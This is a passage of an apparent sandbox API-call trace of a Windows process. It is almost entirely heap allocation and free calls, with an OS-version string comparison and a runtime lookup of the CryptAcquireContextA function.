hHeap=0x25c0000) returned 1 [0266.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0266.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0266.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0266.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0266.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0266.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0266.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0266.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0266.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.204] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0266.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0266.204] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0266.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fa8 [0266.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0266.205] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0266.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0266.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0266.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0266.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0266.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0266.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0266.205] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0266.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0266.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0266.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0266.206] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0266.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0266.206] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0266.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0266.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0266.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0266.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0266.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0266.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0266.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0266.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0266.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0266.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0266.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0266.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0266.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0266.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0266.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0266.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0266.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0266.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0266.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0266.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.210] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0266.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466dd0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0266.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0266.214] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0266.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0266.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0266.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466dd0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0266.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0266.216] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0266.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0266.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0266.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0266.217] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2be8) returned 1 [0266.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0266.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0266.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0266.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0266.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0266.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0266.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0266.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.219] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0266.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0266.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0266.220] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0266.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0266.220] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0266.220] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0266.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0266.220] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0266.220] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.221] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0266.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0266.221] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.221] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.221] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.221] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0266.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0266.221] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0266.234] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0266.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0266.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 